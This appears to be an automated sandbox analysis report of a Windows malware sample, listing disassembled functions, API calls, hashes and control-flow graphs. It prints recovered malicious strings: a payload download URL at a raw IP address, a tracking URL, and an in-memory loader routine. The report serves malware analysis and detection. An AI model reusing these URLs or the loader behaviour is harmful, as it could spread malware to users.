                                                                                                                                                                                                                                                                          control_flow_graph 142 432f29-432f39 143 432f53-432f55 142->143 144 432f3b-432f4e call 42eab6 call 42eac9 142->144 145 432f5b-432f61 143->145 146 4332bd-4332ca call 42eab6 call 42eac9 143->146 158 4332d5 144->158 145->146 150 432f67-432f92 145->150 164 4332d0 call 42a59d 146->164 150->146 153 432f98-432fa1 150->153 156 432fa3-432fb6 call 42eab6 call 42eac9 153->156 157 432fbb-432fbd 153->157 156->164 161 432fc3-432fc7 157->161 162 4332b9-4332bb 157->162 163 4332d8-4332dd 158->163 161->162 166 432fcd-432fd1 161->166 162->163 164->158 166->156 169 432fd3-432fea 166->169 170 433007-433010 169->170 171 432fec-432fef 169->171 175 433012-433029 call 42eab6 call 42eac9 call 42a59d 170->175 176 43302e-433038 170->176 173 432ff1-432ff7 171->173 174 432ff9-433002 171->174 173->174 173->175 177 4330a3-4330bd 174->177 207 4331f0 175->207 179 43303a-43303c 176->179 180 43303f-43305d call 4336a7 call 43346a * 2 176->180 182 4330c3-4330d3 177->182 183 433191-43319a call 43d365 177->183 179->180 211 43307a-4330a0 call 4347ee 180->211 212 43305f-433075 call 42eac9 call 42eab6 180->212 182->183 187 4330d9-4330db 182->187 196 43320d 183->196 197 43319c-4331ae 183->197 187->183 192 4330e1-433107 187->192 192->183 193 43310d-433120 192->193 193->183 198 433122-433124 193->198 200 433211-433229 ReadFile 196->200 197->196 202 4331b0-4331bf GetConsoleMode 197->202 198->183 203 433126-433151 198->203 205 433285-433290 GetLastError 200->205 206 43322b-433231 200->206 202->196 208 4331c1-4331c5 202->208 203->183 210 433153-433166 203->210 213 433292-4332a4 call 42eac9 call 42eab6 205->213 214 4332a9-4332ac 205->214 206->205 215 433233 206->215 209 4331f3-4331fd call 43346a 207->209 208->200 216 4331c7-4331e1 ReadConsoleW 208->216 209->163 210->183 218 433168-43316a 210->218 211->177 212->207 213->207 225 4332b2-4332b4 214->225 226 4331e9-4331ef call 42ea93 214->226 222 433236-433248 215->222 223 4331e3 GetLastError 216->223 224 433202-43320b 216->224 218->183 228 43316c-43318c 218->228 222->209 232 43324a-43324e 222->232 223->226 224->222 225->209 226->207 228->183 237 433250-433260 call 432c45 232->237 238 433267-433272 232->238 249 433263-433265 237->249 239 433274 call 432d95 238->239 240 43327e-433283 call 432a85 238->240 247 433279-43327c 239->247 240->247 247->249 249->209
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                                                                          • Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69
                                                                                                                                                                                                                                                                          Function 0249003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 250 249003c-2490047 251 2490049 250->251 252 249004c-2490263 call 2490a3f call 2490e0f call 2490d90 VirtualAlloc 250->252 251->252 267 249028b-2490292 252->267 268 2490265-2490289 call 2490a69 252->268 269 24902a1-24902b0 267->269 271 24902ce-24903c2 VirtualProtect call 2490cce call 2490ce7 268->271 269->271 272 24902b2-24902cc 269->272 279 24903d1-24903e0 271->279 272->269 280 2490439-24904b8 VirtualFree 279->280 281 24903e2-2490437 call 2490ce7 279->281 283 24904be-24904cd 280->283 284 24905f4-24905fe 280->284 281->279 288 24904d3-24904dd 283->288 285 249077f-2490789 284->285 286 2490604-249060d 284->286 292 249078b-24907a3 285->292 293 24907a6-24907b0 285->293 286->285 290 2490613-2490637 286->290 288->284 289 24904e3-2490505 LoadLibraryA 288->289 294 2490517-2490520 289->294 295 2490507-2490515 289->295 298 249063e-2490648 290->298 292->293 296 249086e-24908be LoadLibraryA 293->296 297 24907b6-24907cb 293->297 299 2490526-2490547 294->299 295->299 306 24908c7-24908f9 296->306 300 24907d2-24907d5 297->300 298->285 301 249064e-249065a 298->301 304 249054d-2490550 299->304 302 2490824-2490833 300->302 303 24907d7-24907e0 300->303 301->285 305 2490660-249066a 301->305 314 2490839-249083c 302->314 309 24907e2 303->309 310 24907e4-2490822 303->310 311 24905e0-24905ef 304->311 312 2490556-249056b 304->312 313 249067a-2490689 305->313 307 24908fb-2490901 306->307 308 2490902-249091d 306->308 307->308 309->302 310->300 311->288 315 249056d 312->315 316 249056f-249057a 312->316 317 249068f-24906b2 313->317 318 2490750-249077a 313->318 314->296 319 249083e-2490847 314->319 315->311 321 249059b-24905bb 316->321 322 249057c-2490599 316->322 323 24906ef-24906fc 317->323 324 24906b4-24906ed 317->324 318->298 325 2490849 319->325 326 249084b-249086c 319->326 333 24905bd-24905db 321->333 322->333 327 249074b 323->327 328 24906fe-2490748 323->328 324->323 325->296 326->314 327->313 328->327 333->304
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0249024D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                          • Instruction ID: 399dcb6eb3918c0fda0455d7dbc85658349493339161d9849fa38a55beedf806
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2525874A01229DFDB64CF58C984BA9BBB1BF09314F1480DAE94DAB351DB30AE95CF14
                                                                                                                                                                                                                                                                          Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180networkCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27
                                                                                                                                                                                                                                                                            • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                                                            • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                                                                          • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00402E4B
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00402E4E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Internet$CloseHandleOpen_wcslen
                                                                                                                                                                                                                                                                          • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                                                                          • API String ID: 3067768807-1501832161
                                                                                                                                                                                                                                                                          • Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                                                                                                                                                                                          • Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E
                                                                                                                                                                                                                                                                          Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1687354797-0
                                                                                                                                                                                                                                                                          • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                                                          • Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9
                                                                                                                                                                                                                                                                          Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Cnd_initX.LIBCPMT ref: 0040581C
                                                                                                                                                                                                                                                                          • __Cnd_signal.LIBCPMT ref: 00405828
                                                                                                                                                                                                                                                                          • std::_Cnd_initX.LIBCPMT ref: 0040583D
                                                                                                                                                                                                                                                                          • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2059591211-0
                                                                                                                                                                                                                                                                          • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                          • Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D
                                                                                                                                                                                                                                                                          Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                                                          • String ID: F(@
                                                                                                                                                                                                                                                                          • API String ID: 1611280651-2698495834
                                                                                                                                                                                                                                                                          • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                                                                                                                                                                                          • Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C
                                                                                                                                                                                                                                                                          Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 435 42e114-42e11f 436 42e121-42e133 call 42eac9 call 42a59d 435->436 437 42e135-42e148 call 42e0cb 435->437 451 42e185-42e188 436->451 443 42e176 437->443 444 42e14a-42e167 CreateThread 437->444 448 42e178-42e184 call 42e03d 443->448 446 42e189-42e18e 444->446 447 42e169-42e175 GetLastError call 42ea93 444->447 449 42e190-42e193 446->449 450 42e195-42e197 446->450 447->443 448->451 449->450 450->448
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0042E170
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2744730728-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                                                                                                                                                                                                                          • Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8
                                                                                                                                                                                                                                                                          Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 456 434755-43476d call 439921 459 434780-434796 SetFilePointerEx 456->459 460 43476f-434774 call 42eac9 456->460 462 4347a7-4347b1 459->462 463 434798-4347a5 GetLastError call 42ea93 459->463 467 43477a-43477e 460->467 466 4347b3-4347c8 462->466 462->467 463->467 468 4347cd-4347d2 466->468 467->468
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0043479F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                          • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                                                                                                                                                                                          • Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98
                                                                                                                                                                                                                                                                          Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 470 402bad-402bd9 RegCreateKeyExW 471 402bdb-402bed RegSetValueExW 470->471 472 402bef-402bf2 470->472 471->472 473 402bf4-402bf7 RegCloseKey 472->473 474 402bfd-402c03 472->474 473->474
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
                                                                                                                                                                                                                                                                          • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseCreateValue
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1818849710-0
                                                                                                                                                                                                                                                                          • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                                                                                                                                                                                          • Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664
                                                                                                                                                                                                                                                                          Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31threadCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 475 42e074-42e081 call 431f5e 478 42e083-42e086 ExitThread 475->478 479 42e08c-42e094 475->479 479->478 480 42e096-42e09a 479->480 481 42e0a1-42e0a7 480->481 482 42e09c call 4354f6 480->482 484 42e0b4-42e0ba 481->484 485 42e0a9-42e0ab 481->485 482->481 484->478 486 42e0bc-42e0be 484->486 485->484 487 42e0ad-42e0ae CloseHandle 485->487 486->478 488 42e0c0-42e0ca FreeLibraryAndExitThread 486->488 487->484
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                                                                                                                                                                                                                            • Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
                                                                                                                                                                                                                                                                            • Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 0042E086
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
                                                                                                                                                                                                                                                                          • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1198197534-0
                                                                                                                                                                                                                                                                          • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                                                                          • Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659
                                                                                                                                                                                                                                                                          Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125windowCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 489 40239e-4023ac 490 402561-402563 PostQuitMessage 489->490 491 4023b2-4023b7 489->491 492 402569-40256e 490->492 493 4023d0-4023d7 491->493 494 4023b9-4023cb DefWindowProcW 491->494 495 4023d9 call 401da4 493->495 496 4023de-4023e5 493->496 494->492 495->496 496->492 498 4023eb-40255f call 4010ba call 4029f4 496->498 498->492
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
                                                                                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00402563
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: MessagePostProcQuitWindow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3873111417-0
                                                                                                                                                                                                                                                                          • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                          • Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E
                                                                                                                                                                                                                                                                          Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101sleepCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 503 40155a-4016d0 Sleep call 4010ba 505 4016d5-4016d9 503->505
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001D1B), ref: 00401562
                                                                                                                                                                                                                                                                            • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                                                            • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _wcslen$Sleep
                                                                                                                                                                                                                                                                          • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                                                          • API String ID: 3358372957-3120454669
                                                                                                                                                                                                                                                                          • Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                                                                                                                                                                                          • Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E
                                                                                                                                                                                                                                                                          Function 00402960 Relevance: 3.0, APIs: 2, Instructions: 49COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0040298F
                                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 0040299F
                                                                                                                                                                                                                                                                            • Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2843524283-0
